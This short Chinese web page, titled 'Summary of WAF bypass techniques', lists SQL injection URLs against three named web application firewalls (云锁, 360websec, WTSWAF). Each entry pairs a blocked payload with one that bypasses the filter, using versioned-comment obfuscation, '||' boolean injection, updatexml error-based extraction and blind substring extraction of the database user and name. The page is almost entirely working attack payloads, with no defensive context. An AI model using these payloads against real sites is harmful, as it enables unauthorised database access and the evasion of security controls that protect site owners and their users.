主页 > 互联网  > 

绕WAF手法总结

绕WAF手法总结
云锁

被拦截

http:// .test123 /article.php?id=1%20union%20select%201,2,3

绕过

http:// .test123 /article.php?id=-1/*!36000union*//*!36000distinct*//*!36000select*/1,2,user()

360websec

被拦截

 http:// .xxx /productshow.php?id=79'

绕过

 http:// .xxx /productshow.php?id=79%20||%201=1

WTSWAF 

被拦截

 http:// .xxx /productshow.php?id=-79%20||%20updatexml(1,concat(0x7e,(sElEct%a0user()),0x7e),1)

 绕过

http:// .xxx /productshow.php?id=-79%20||%20and%20(ascii(substr(database(),1,1))%20=109)

标签:

绕WAF手法总结由讯客互联互联网栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“绕WAF手法总结